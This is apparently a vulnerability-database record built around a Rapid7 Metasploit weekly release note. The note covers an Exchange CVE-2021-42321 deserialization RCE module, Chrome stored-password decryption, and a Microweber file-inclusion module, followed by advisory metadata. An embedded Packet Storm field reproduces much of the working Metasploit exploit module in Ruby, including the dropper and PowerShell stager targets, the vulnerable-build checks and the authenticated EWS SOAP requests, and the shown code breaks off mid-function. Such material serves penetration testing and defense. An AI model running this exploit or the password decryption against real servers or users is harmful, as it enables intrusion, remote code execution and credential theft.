Metasploit Weekly Wrap-Up

2022-02-25T21:48:46

Description

## Exchange RCE ![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/02/metasploit-ascii-1-2.png) Exchange remote code execution vulnerabilities are always valuable exploits to have. This week Metasploit added an exploit for an authenticated RCE in Microsoft Exchange servers 2016 and server 2019 identified as [CVE-2021-42321](<https://attackerkb.com/topics/4JMe2Y1WSY/cve-2021-42321?referrer=blog>). The flaw leveraged by the exploit exists in a misconfigured denylist that failed to prevent a serialized blob from being loaded resulting in code execution. While this is an authenticated vulnerability, a standard user has sufficient permissions to trigger it which likely encompasses most users within an organization that uses Exchange. The vulnerability affects Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2. ## Chrome Password Decryption Community member [timwr](<https://github.com/timwr>) updated the existing Chrome enumeration module to support decrypting passwords from modern versions of Chrome. The module can now decrypt both the new and old formats of passwords. This is helpful because when Chrome is updated, passwords in the old format are not updated to the new format. ## New module content (2) * [Microweber CMS v1.2.10 Local File Inclusion (Authenticated)](<https://github.com/rapid7/metasploit-framework/pull/16156>) by Talha Karakumru - Adds a new module `auxiliary/gather/microweber_lfi` which targets Microweber CMS v1.2.10 and allows authenticated users to read arbitrary files on disk. * [Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE](<https://github.com/rapid7/metasploit-framework/pull/16164>) by Grant Willcox, Microsoft Security Response Center, Microsoft Threat Intelligence Center, peterjson, pwnforsp, testanull, and zcgonvh, which exploits [CVE-2021-42321](<https://attackerkb.com/topics/4JMe2Y1WSY/cve-2021-42321?referrer=blog>) \- This adds an exploit for CVE-2021-42321 which is an authenticated RCE in Microsoft Exchange. The vulnerability is related to a misconfigured deny-list that fails to properly prevent malicious serialized objects from being loaded, leading to code execution. ## Enhancements and features * [#16061](<https://github.com/rapid7/metasploit-framework/pull/16061>) from [shoxxdj](<https://github.com/shoxxdj>) \- The `wordpress_scanner` module has been updated to support enumerating WordPress users using the `wp-json` API. * [#16200](<https://github.com/rapid7/metasploit-framework/pull/16200>) from [timwr](<https://github.com/timwr>) \- This updates post/windows/enum_chrome to support decrypting stored passwords for Chrome versions greater than 80. ## Bugs fixed * [#16197](<https://github.com/rapid7/metasploit-framework/pull/16197>) from [adfoster-r7](<https://github.com/adfoster-r7>) \- This fixes an edge case when reading files on Windows, and fixes Ruby 3 crashes when reading files. * [#16215](<https://github.com/rapid7/metasploit-framework/pull/16215>) from [bwatters-r7](<https://github.com/bwatters-r7>) \- This updates payloads version to 2.0.75, taking in the changes landed in <https://github.com/rapid7/metasploit-payloads/pull/542> and fixes a bug in Windows Meterpreter `getsystem` command where a failed attempt to elevate can result in a partially-broken session. * [#16093](<https://github.com/rapid7/metasploit-framework/pull/16093>) from [h00die](<https://github.com/h00die>) \- A number of broken URL references have been fixed in Metasploit modules. In addition, the `tools/modules/module_reference.rb` code has been updated to log redirects so that they can be appropriately triaged later and to support saving results to a CSV file. Finally, several modules had their code adjusted to conform to RuboCop standards. ## Get it As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub: * [Pull Requests 6.1.30...6.1.31](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-16T23%3A31%3A40-06%3A00..2022-02-24T11%3A00%3A46-06%3A00%22>) * [Full diff 6.1.30...6.1.31](<https://github.com/rapid7/metasploit-framework/compare/6.1.30...6.1.31>) If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).

{"id": "RAPID7BLOG:F128DF1DF900C5377CF4BBF1DFD03A1A", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Weekly Wrap-Up", "description": "## Exchange RCE\n\n![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/02/metasploit-ascii-1-2.png)\n\nExchange remote code execution vulnerabilities are always valuable exploits to have. This week Metasploit added an exploit for an authenticated RCE in Microsoft Exchange servers 2016 and server 2019 identified as [CVE-2021-42321](<https://attackerkb.com/topics/4JMe2Y1WSY/cve-2021-42321?referrer=blog>). The flaw leveraged by the exploit exists in a misconfigured denylist that failed to prevent a serialized blob from being loaded resulting in code execution. While this is an authenticated vulnerability, a standard user has sufficient permissions to trigger it which likely encompasses most users within an organization that uses Exchange. The vulnerability affects Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.\n\n## Chrome Password Decryption\n\nCommunity member [timwr](<https://github.com/timwr>) updated the existing Chrome enumeration module to support decrypting passwords from modern versions of Chrome. The module can now decrypt both the new and old formats of passwords. This is helpful because when Chrome is updated, passwords in the old format are not updated to the new format.\n\n## New module content (2)\n\n * [Microweber CMS v1.2.10 Local File Inclusion (Authenticated)](<https://github.com/rapid7/metasploit-framework/pull/16156>) by Talha Karakumru - Adds a new module `auxiliary/gather/microweber_lfi` which targets Microweber CMS v1.2.10 and allows authenticated users to read arbitrary files on disk.\n * [Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE](<https://github.com/rapid7/metasploit-framework/pull/16164>) by Grant Willcox, Microsoft Security Response Center, Microsoft Threat Intelligence Center, peterjson, pwnforsp, testanull, and zcgonvh, which exploits [CVE-2021-42321](<https://attackerkb.com/topics/4JMe2Y1WSY/cve-2021-42321?referrer=blog>) \\- This adds an exploit for CVE-2021-42321 which is an authenticated RCE in Microsoft Exchange. The vulnerability is related to a misconfigured deny-list that fails to properly prevent malicious serialized objects from being loaded, leading to code execution.\n\n## Enhancements and features\n\n * [#16061](<https://github.com/rapid7/metasploit-framework/pull/16061>) from [shoxxdj](<https://github.com/shoxxdj>) \\- The `wordpress_scanner` module has been updated to support enumerating WordPress users using the `wp-json` API.\n * [#16200](<https://github.com/rapid7/metasploit-framework/pull/16200>) from [timwr](<https://github.com/timwr>) \\- This updates post/windows/enum_chrome to support decrypting stored passwords for Chrome versions greater than 80.\n\n## Bugs fixed\n\n * [#16197](<https://github.com/rapid7/metasploit-framework/pull/16197>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an edge case when reading files on Windows, and fixes Ruby 3 crashes when reading files.\n * [#16215](<https://github.com/rapid7/metasploit-framework/pull/16215>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates payloads version to 2.0.75, taking in the changes landed in <https://github.com/rapid7/metasploit-payloads/pull/542> and fixes a bug in Windows Meterpreter `getsystem` command where a failed attempt to elevate can result in a partially-broken session.\n * [#16093](<https://github.com/rapid7/metasploit-framework/pull/16093>) from [h00die](<https://github.com/h00die>) \\- A number of broken URL references have been fixed in Metasploit modules. In addition, the `tools/modules/module_reference.rb` code has been updated to log redirects so that they can be appropriately triaged later and to support saving results to a CSV file. Finally, several modules had their code adjusted to conform to RuboCop standards.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.30...6.1.31](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-16T23%3A31%3A40-06%3A00..2022-02-24T11%3A00%3A46-06%3A00%22>)\n * [Full diff 6.1.30...6.1.31](<https://github.com/rapid7/metasploit-framework/compare/6.1.30...6.1.31>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2022-02-25T21:48:46", "modified": "2022-02-25T21:48:46", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/02/25/metasploit-weekly-wrap-up-2/", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2021-42321"], "immutableFields": [], "lastseen": "2022-02-25T23:28:01", "viewCount": 114, "enchantments": {"backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:EA6AD256-9B4E-4DC6-B230-9ADED3EE40C0"]}, {"type": "avleonov", "idList": ["AVLEONOV:C2458CFFC4493B2CEDB0D34243DEBE3F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0906"]}, {"type": "cisa", "idList": ["CISA:D12090E3D1C36426271DE8458FFF31E4"]}, {"type": "cve", "idList": ["CVE-2021-42321"]}, {"type": "githubexploit", "idList": ["55F902F5-E290-577E-A48D-FB56855B1CBB"]}, {"type": "hivepro", "idList": ["HIVEPRO:846AE370AF77A81941A26AF3FC365026"]}, {"type": "kaspersky", "idList": ["KLA12342"]}, {"type": "krebs", "idList": ["KREBS:7B6AC3C7BFC3E69830DAE975AA547ADC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:459DABFC50E1B6D279EDCFD609D8DD50"]}, {"type": "mscve", "idList": ["MS:CVE-2021-42321"]}, {"type": "mskb", "idList": ["KB5007409"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_NOV_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166153"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:95B6925D28299FFFDEA3BD6BA8F3E443"]}, {"type": "thn", "idList": ["THN:554E88E6A1CE9AFD04BF297E68311306"]}, {"type": "threatpost", "idList": ["THREATPOST:C23B7DE85B27B6A8707D0016592B87A3"]}, {"type": "zdt", "idList": ["1337DAY-ID-37423"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:EA6AD256-9B4E-4DC6-B230-9ADED3EE40C0"]}, {"type": "avleonov", "idList": ["AVLEONOV:C2458CFFC4493B2CEDB0D34243DEBE3F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0906"]}, {"type": "cisa", "idList": ["CISA:D12090E3D1C36426271DE8458FFF31E4"]}, {"type": "cve", "idList": ["CVE-2021-42321"]}, {"type": "githubexploit", "idList": ["55F902F5-E290-577E-A48D-FB56855B1CBB"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:846AE370AF77A81941A26AF3FC365026"]}, {"type": "kaspersky", "idList": ["KLA12342"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634"]}, {"type": "krebs", "idList": ["KREBS:7B6AC3C7BFC3E69830DAE975AA547ADC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:459DABFC50E1B6D279EDCFD609D8DD50"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_CHAINEDSERIALIZATIONBINDER_DENYLIST_TYPO_RCE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-42321"]}, {"type": "mskb", "idList": ["KB5007409"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_NOV_EXCHANGE.NASL", "SMB_NT_MS21_NOV_EXCHANGE_REMOTE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166153"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:95B6925D28299FFFDEA3BD6BA8F3E443"]}, {"type": "thn", "idList": ["THN:554E88E6A1CE9AFD04BF297E68311306"]}, {"type": "threatpost", "idList": ["THREATPOST:C23B7DE85B27B6A8707D0016592B87A3"]}, {"type": "zdt", "idList": ["1337DAY-ID-37423"]}]}, "epss": [{"cve": "CVE-2021-42321", "epss": "0.944740000", "percentile": "0.987060000", "modified": "2023-03-18"}], "vulnersScore": -0.2}, "_state": {"dependencies": 1659988328, "score": 1659990670, "epss": 1679179052}, "_internal": {"score_hash": "7ccb681113b7f922c57be2ee9014ee20"}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:04", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-42321)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2021-11-23T00:00:00", "id": "CPAI-2021-0906", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "An authenticated attacker could leverage improper validation in cmdlet arguments within Microsoft Exchange and perform remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2021-11-17T00:00:00", "id": "CISA-KEV-CVE-2021-42321", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:33:27", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2022-06-21T07:00:00", "id": "MS:CVE-2021-42321", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-02-25T15:08:56", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-25T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Server Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2022-02-25T00:00:00", "id": "PACKETSTORM:166153", "href": "https://packetstormsecurity.com/files/166153/Microsoft-Exchange-Server-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'nokogiri' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE', \n'Description' => %q{ \nThis vulnerability allows remote attackers to execute arbitrary code \non Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 \nprior to Security Update 2, Exchange Server 2016 CU21 prior to \nSecurity Update 3, and Exchange Server 2016 CU22 prior to \nSecurity Update 2. \n \nNote that authentication is required to exploit this vulnerability. \n \nThe specific flaw exists due to the fact that the deny list for the \nChainedSerializationBinder had a typo whereby an entry was typo'd as \nSystem.Security.ClaimsPrincipal instead of the proper value of \nSystem.Security.Claims.ClaimsPrincipal. \n \nBy leveraging this vulnerability, attacks can bypass the \nChainedSerializationBinder's deserialization deny list \nand execute code as NT AUTHORITY\\SYSTEM. \n \nTested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, \nand Exchange Server 2016 CU22 SU0 on Windows Server 2016. \n}, \n'Author' => [ \n'pwnforsp', # Original Bug Discovery \n'zcgonvh', # Of 360 noah lab, Original Bug Discovery \n'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild \n'Microsoft Security Response Center', # Discovery of exploitation in the wild \n'peterjson', # Writeup \n'testanull', # PoC Exploit \n'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D \n], \n'References' => [ \n['CVE', '2021-42321'], \n['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'], \n['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'], \n['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'], \n['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'], \n['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'] \n], \n'DisclosureDate' => '2021-12-09', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n} \n], \n[ \n'Windows Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest \n} \n} \n], \n[ \n'PowerShell Stager', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'HttpClientTimeout' => 5, \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169 \nCONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger. \n] \n} \n) \n) \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('HttpUsername', [true, 'The username to log into the Exchange server as', '']), \nOptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server', '']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n# https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 \n[ \n[Rex::Version.new('15.1.2308.8'), Rex::Version.new('15.1.2308.20')], # Exchange Server 2016 CU21 \n[Rex::Version.new('15.1.2375.7'), Rex::Version.new('15.1.2375.17')], # Exchange Server 2016 CU22 \n[Rex::Version.new('15.2.922.7'), Rex::Version.new('15.2.922.19')], # Exchange Server 2019 CU10 \n[Rex::Version.new('15.2.986.5'), Rex::Version.new('15.2.986.14')] # Exchange Server 2019 CU11 \n] \nend \n \ndef check \n# First lets try a cheap way of doing this via a leak of the X-OWA-Version header. \n# If we get this we know the version number for sure and we can skip a lot of leg work. \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/owa/service') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.headers['X-OWA-Version'] \nbuild = res.headers['X-OWA-Version'] \nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\") \nelse \nreturn CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\") \nend \nend \n \n# Next, determine if we are up against an older version of Exchange Server where \n# the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange \n# give only a partial version without the build number. \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.code == 200 && ((%r{/owa/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body)) \nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\") \nelse \nreturn CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\") \nend \nend \n \n# Next try @tseller's way and try /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application \n# URL which if successful should provide some XML with entries like the following: \n# \n# <assemblyIdentity name=\"microsoft.exchange.ediscovery.exporttool.application\" \n# version=\"15.2.986.5\" publicKeyToken=\"b1d1a6c45aa418ce\" language=\"neutral\" \n# processorArchitecture=\"msil\" xmlns=\"urn:schemas-microsoft-com:asm.v1\" /> \n# \n# This only works on Exchange Server 2013 and later and may not always work, but if it \n# does work it provides the full version number so its a nice strategy. \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.code == 200 && res.body =~ /name=\"microsoft.exchange.ediscovery.exporttool\" version=\"\\d+\\.\\d+\\.\\d+\\.\\d+\"/ \nbuild = res.body.match(/name=\"microsoft.exchange.ediscovery.exporttool\" version=\"(\\d+\\.\\d+\\.\\d+\\.\\d+)\"/)[1] \nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\") \nelse \nreturn CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\") \nend \nend \n \n# Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx \n# to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200 \n# OK response, we found the target version number, otherwise we didn't find it. \n# \n# Props go to @jmartin-r7 for improving my original code for this and suggestion the use of \n# canonical_segments to make this close to the Rex::Version code format. Also for noticing that \n# version_range is a Rex::Version object already and cleaning up some of my original code to simplify \n# things on this premise. \n \nvuln_builds.each do |version_range| \nreturn CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2] \n \nprepend_range = version_range[0].canonical_segments[0..-2] \nlowest_patch = version_range[0].canonical_segments.last \nwhile Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1] \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/ecp/#{build}/exporttool/\") \n) \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \nif res && res.code == 200 \nreturn CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\") \nend \n \nlowest_patch += 1 \nend \n \nCheckCode::Unknown('Could not determine the build number of the target Exchange Server.') \nend \nend \n \ndef exploit \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# Get the user's inbox folder's ID and change key ID. \nprint_status(\"Getting the user's inbox folder's ID and ChangeKey ID...\") \nxml_getfolder_inbox = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\" /> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_getfolder_inbox, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nxml_getfolder = res.get_xml_document \nxml_getfolder.remove_namespaces! \nxml_tag = xml_getfolder.xpath('//FolderId') \nif xml_tag.empty? \nfail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!') \nend \nunless 